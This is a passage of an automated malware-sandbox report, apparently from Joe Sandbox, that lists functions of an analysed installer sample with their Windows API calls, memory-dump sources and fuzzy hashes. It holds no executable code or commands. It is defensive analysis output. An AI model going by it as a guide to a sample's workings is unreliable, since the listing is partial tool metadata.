Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D

Function 004054E7 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 004054F7

Part of subcall function 00404391: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A3

CoUninitialize.COMBASE(00000404,00000000), ref: 00405543

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: 9116b902906b86037e4df952d1fb06ecf8b3d5b9aeab51ae864e340321e9afd2
Instruction ID: 461e397135febbc30a5c9d3c302966ffa091eeef35a1e5a31f22b0d6bdb391fd
Opcode Fuzzy Hash: 9116b902906b86037e4df952d1fb06ecf8b3d5b9aeab51ae864e340321e9afd2
Instruction Fuzzy Hash: E1F0F072600A00EBE7215B80AD01B267365EBC4304F41407BFE88723A4C77A4C02CBAE

Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E61
EnableWindow.USER32(00000000,00000000), ref: 00401E6C

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 0d9b5a9160a84728accbd0ba24abc03ccaba2c832cc1b566ade503702ea0418f
Instruction ID: 353457a250eeab47012712e359045a90ae935b3a48e85cb5936bf3a8ff6902a1
Opcode Fuzzy Hash: 0d9b5a9160a84728accbd0ba24abc03ccaba2c832cc1b566ade503702ea0418f
Instruction Fuzzy Hash: 40E09232E08200CFD724DBA5AA4946D77B0EB84354720407FE112F11D1DA784881CF6D

Function 0040678A Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
GetProcAddress.KERNEL32(00000000,?), ref: 004067B7

Part of subcall function 0040671A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406731
Part of subcall function 0040671A: wsprintfW.USER32 ref: 0040676C
Part of subcall function 0040671A: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406780

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 1fd694bbbc018e5f81eae6ff46d5e7dd0c39e86c0a2cf65890550c3579ed631a
Instruction ID: 6fedc38abd16d04710e8a636fd16f84820eabe090bba127bd882252d3fb3e83b
Opcode Fuzzy Hash: 1fd694bbbc018e5f81eae6ff46d5e7dd0c39e86c0a2cf65890550c3579ed631a
Instruction Fuzzy Hash: 21E0863250421156D21096745E4893772AC9AC4718307843EF956F3041DB389C35A76D

Function 00405EA2 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402F57,00438800,80000000,00000003), ref: 00405EA6
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15

Function 00405E7D Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405A82,?,?,00000000,00405C58,?,?,?,?), ref: 00405E82
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E96

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction ID: b4a9c655c7fc096b4b126609cc6ca019b0e5db690544b5b17486f729e9fe50d2
Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction Fuzzy Hash: F4D0C972504420ABC2502728EF0889BBB95DB542727124B35FAE9A22B0CB304C568A98

Function 00405960 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,0040347C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004036D5,?,00000006,00000008,0000000A), ref: 00405966
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405974

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
Instruction ID: a0b70af09676f49ae35af12b400ff138e6ea5c47fed9fef2c083bef2843b0e9d
Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
Instruction Fuzzy Hash: 97C04C71255506DADB105F31DE08F1B7A50AB60751F11843AA18AE51B0DA348455DD2D

Function 004039CC Relevance: 2.5, APIs: 2, Instructions: 20COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,75573420,004037FF,00000006,?,00000006,00000008,0000000A), ref: 004039DE
CloseHandle.KERNEL32(FFFFFFFF,75573420,004037FF,00000006,?,00000006,00000008,0000000A), ref: 004039F2

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: b55cff4552d52d76d05c17db1d45919cd3b2f7dc16ec8014ab047bfb7f0b1341
Instruction ID: fc38efd84d8d016dcd3317839c289eb32d5c21f0986e32e85f71fbf804eaa656
Opcode Fuzzy Hash: b55cff4552d52d76d05c17db1d45919cd3b2f7dc16ec8014ab047bfb7f0b1341
Instruction Fuzzy Hash: 32E0867150071496C524AF7CAE4A5863A185B45335B204726F0B8F21F0C77899675ED9

Function 00402306 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D

Function 00405F54 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,004112E5,0040CED0,004033C2,0040CED0,004112E5,00414ED0,00004000,?,00000000,004031EC,00000004), ref: 00405F68

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction ID: 6078229a914e39b74a0c5ece066be2a5834b756046c3aff4b734283800ecbe33
Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction Fuzzy Hash: 2DE0EC3221065EABDF109EA59C00EEB7B6CFB053A0F004437FD25E3150D775E9219BA8

Function 00405F25 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040343E,0040A230,0040A230,00403342,00414ED0,00004000,?,00000000,004031EC), ref: 00405F39

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction ID: 9b2ea83f702eb3fffeb4c264c614e4c5cb206e28bf88f3110778221d7db1fef5
Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction Fuzzy Hash: D7E08C3220021AEBCF109F508C00EEB3B6CEB04360F004472F925E2180E234E8219FA8

Function 0040621D Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000039,004281E0,?,00000039,?,004062AB,?,00000000,00000039,00000039,004281E0,?), ref: 00406241

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: 3024dc78f91217c8ac754af2bee00b96045fdb9f0f4599777b3fb0e88d8c22ab
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: 8AD0123200020DBBDF116E919D05FAB371DEB04310F014426FE16A4091D775D530AB15

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2649f5da5d887e61587a2cb4427c422aea5fe64ba67ab3b65f439a0ed3d10397
Instruction ID: 608ef69ca2b13f27eda1cfcd16162797e0d7c1effb02ba883df1ee114d760796
Opcode Fuzzy Hash: 2649f5da5d887e61587a2cb4427c422aea5fe64ba67ab3b65f439a0ed3d10397
Instruction Fuzzy Hash: 44D01272B04104DBDB21DBA4AF0859D73A59B10364B204677E101F11D1DAB989559A1D

Function 00404391 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A3

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a452b7de42f14c8de3af57d1a741f17fe5c7e0b0fce0339b2d36eea9d11f7e20
Instruction ID: cd8ab83c4a05c7db73f02061534639f879ad9b89da22042d3f94ff2104185c27
Opcode Fuzzy Hash: a452b7de42f14c8de3af57d1a741f17fe5c7e0b0fce0339b2d36eea9d11f7e20
Instruction Fuzzy Hash: 83C04CB5780200BAEA208BA49D85F0677545B90700F1449797640F50E0C674D460D66C

Function 00403441 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313F,?), ref: 0040344F

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D

Function 0040437A Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004041A5), ref: 00404388

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
